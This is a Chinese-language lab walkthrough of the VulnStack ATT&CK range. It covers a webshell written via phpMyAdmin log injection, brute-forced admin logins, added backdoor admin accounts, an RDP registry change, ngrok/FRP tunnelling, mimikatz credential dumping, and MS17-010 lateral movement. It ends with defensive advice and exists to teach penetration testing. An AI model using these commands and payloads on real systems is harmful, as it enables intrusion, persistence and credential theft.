Vlunstack ATT&CK实战系列0x1
字数 1784 2025-08-18 11:39:19

VulnStack ATT&CK实战系列0x1 渗透测试教学文档

环境概述

靶机环境

  • Windows 7 (跳板机)

    • 双网卡配置
      • 外网IP: 192.168.31.129
      • 内网IP: 192.168.52.143
    • 运行服务: yxcms
    • 角色: 内外网连接桥梁

  • Windows 2008 (域控制器)

    • 内网IP: 192.168.52.138
    • 角色: 主域控制器(OWA)

  • Win2k3 (域内主机)

    • 内网IP: 192.168.52.141
    • 主机名: ROOT-TVI862UBEH

攻击流程

0x1. 获取WebShell

  1. 目标识别

    • 发现yxcms系统: http://192.168.31.129/yxcms/
    • 默认后台地址: http://192.168.31.129/yxcms/index.php?r=admin/index/login

  2. 漏洞利用

    • 验证码绕过: 发现验证码不刷新,可爆破
    • phpMyAdmin弱口令: root/root
    • 日志写入WebShell: 
      set global general_log=on;
set global general_log_file='C:/phpstudy/www/fuck.php';
select '<?php eval($_POST["fuck"])?>';
    • yxcms后台爆破: admin/123456
    • CSRF漏洞利用: 通过HTML表单生成第二个WebShell

  3. WebShell连接

    • 使用蚁剑连接
    • 路径: http://192.168.31.129/yxcms/protected/apps/default/view/default/fuck.php
    • 密码: fuck

0x2. 内网渗透

  1. 权限提升

    • 确认当前为管理员权限
    • 确认存在域环境

  2. 远程桌面配置

    • 检查3389端口状态: netstat -ano | find "3389"
    • 开启远程桌面: 
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  3. 用户添加

    net user test @!FuckSEC!@ /add
net localgroup administrators test /add
net user test

  4. 防火墙绕过

    • 使用ngrok的FRP创建TCP隧道
    • 执行命令: sunny.exe --clientid=隧道id

0x3. 信息收集

  1. 网络环境

    • ipconfig /all 查看网络配置
    • net config Workstation 查询计算机信息

  2. 进程与共享

    • tasklist /v 查看进程
    • net view 查看共享资源

  3. 域信息

    • 主域控制器: OWA (192.168.52.138)
    • 其他主机: ROOT-TVI862UBEH (192.168.52.141)

0x4. 密码获取

  1. Hash提取

    • 使用CS的hashdump读取内存密码
    • 使用mimikatz读取注册表密码: logonpasswords

  2. 获取凭证

    • 获取Administrator明文密码: hongrisec@2019

0x5. 横向渗透

  1. 代理设置

    • CS上开通socks通道: socks 9999
    • 攻击机配置proxychains: 
      socks4 127.0.0.1 9999
    • 启动msf: proxychains msfconsole

  2. Win2k3渗透

    • 端口扫描: 发现445开放
    • 使用admin/smb/ms17_010_command模块执行命令: 
      net user test @!FuckSEC!@ /add
net localgroup administrators test /add
    • 开启3389: 
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    • 连接: proxychains rdesktop 192.168.52.141

  3. Windows 2008渗透

    • 端口扫描: 发现445, 80, 88, 135, 139, 389, 445等
    • 使用admin/smb/ms17_010_command添加用户
    • IPC$连接上传上线马
    • 使用计划任务执行

  4. 域控渗透

    • 使用mimikatz获取域管凭证

关键技术与工具

  1. Web漏洞利用

    • 验证码绕过
    • phpMyAdmin日志注入
    • CSRF漏洞利用

  2. 内网穿透

    • FRP隧道
    • ngrok服务

  3. 横向移动

    • MS17-010漏洞利用
    • IPC$共享利用
    • 计划任务执行

  4. 凭证获取

    • mimikatz
    • CS的hashdump

  5. 代理技术

    • proxychains
    • CS的socks代理

防御建议

  1. Web应用安全

    • 修复验证码逻辑漏洞
    • 修改默认凭证
    • 禁用不必要的数据库功能

  2. 系统安全

    • 限制远程桌面访问
    • 配置防火墙规则
    • 及时修补已知漏洞(如MS17-010)

  3. 域安全

    • 监控异常账户添加
    • 限制域管账户使用范围
    • 启用LSA保护

  4. 日志监控

    • 监控异常进程创建
    • 监控计划任务变更
    • 监控注册表关键项修改

总结

本案例展示了从外网Web渗透到内网横向移动的完整攻击链,涉及Web漏洞利用、权限提升、内网穿透、横向移动和域渗透等多个技术环节。防御方应重点关注边界安全、权限控制和异常行为监控。

VulnStack ATT&CK实战系列0x1 渗透测试教学文档 环境概述 靶机环境 Windows 7 (跳板机) 双网卡配置 外网IP: 192.168.31.129 内网IP: 192.168.52.143 运行服务: yxcms 角色: 内外网连接桥梁 Windows 2008 (域控制器) 内网IP: 192.168.52.138 角色: 主域控制器(OWA) Win2k3 (域内主机) 内网IP: 192.168.52.141 主机名: ROOT-TVI862UBEH 攻击流程 0x1. 获取WebShell 目标识别 发现yxcms系统: http://192.168.31.129/yxcms/ 默认后台地址: http://192.168.31.129/yxcms/index.php?r=admin/index/login 漏洞利用 验证码绕过 : 发现验证码不刷新,可爆破 phpMyAdmin弱口令 : root/root 日志写入WebShell : yxcms后台爆破 : admin/123456 CSRF漏洞利用 : 通过HTML表单生成第二个WebShell WebShell连接 使用蚁剑连接 路径: http://192.168.31.129/yxcms/protected/apps/default/view/default/fuck.php 密码: fuck 0x2. 内网渗透 权限提升 确认当前为管理员权限 确认存在域环境 远程桌面配置 检查3389端口状态: netstat -ano | find "3389" 开启远程桌面: 用户添加 防火墙绕过 使用ngrok的FRP创建TCP隧道 执行命令: sunny.exe --clientid=隧道id 0x3. 信息收集 网络环境 ipconfig /all 查看网络配置 net config Workstation 查询计算机信息 进程与共享 tasklist /v 查看进程 net view 查看共享资源 域信息 主域控制器: OWA (192.168.52.138) 其他主机: ROOT-TVI862UBEH (192.168.52.141) 0x4. 密码获取 Hash提取 使用CS的 hashdump 读取内存密码 使用 mimikatz 读取注册表密码: logonpasswords 获取凭证 获取Administrator明文密码: hongrisec@2019 0x5. 横向渗透 代理设置 CS上开通socks通道: socks 9999 攻击机配置proxychains: 启动msf: proxychains msfconsole Win2k3渗透 端口扫描: 发现445开放 使用 admin/smb/ms17_010_command 模块执行命令: 开启3389: 连接: proxychains rdesktop 192.168.52.141 Windows 2008渗透 端口扫描: 发现445, 80, 88, 135, 139, 389, 445等 使用 admin/smb/ms17_010_command 添加用户 IPC$连接上传上线马 使用计划任务执行 域控渗透 使用mimikatz获取域管凭证 关键技术与工具 Web漏洞利用 验证码绕过 phpMyAdmin日志注入 CSRF漏洞利用 内网穿透 FRP隧道 ngrok服务 横向移动 MS17-010漏洞利用 IPC$共享利用 计划任务执行 凭证获取 mimikatz CS的hashdump 代理技术 proxychains CS的socks代理 防御建议 Web应用安全 修复验证码逻辑漏洞 修改默认凭证 禁用不必要的数据库功能 系统安全 限制远程桌面访问 配置防火墙规则 及时修补已知漏洞(如MS17-010) 域安全 监控异常账户添加 限制域管账户使用范围 启用LSA保护 日志监控 监控异常进程创建 监控计划任务变更 监控注册表关键项修改 总结 本案例展示了从外网Web渗透到内网横向移动的完整攻击链,涉及Web漏洞利用、权限提升、内网穿透、横向移动和域渗透等多个技术环节。防御方应重点关注边界安全、权限控制和异常行为监控。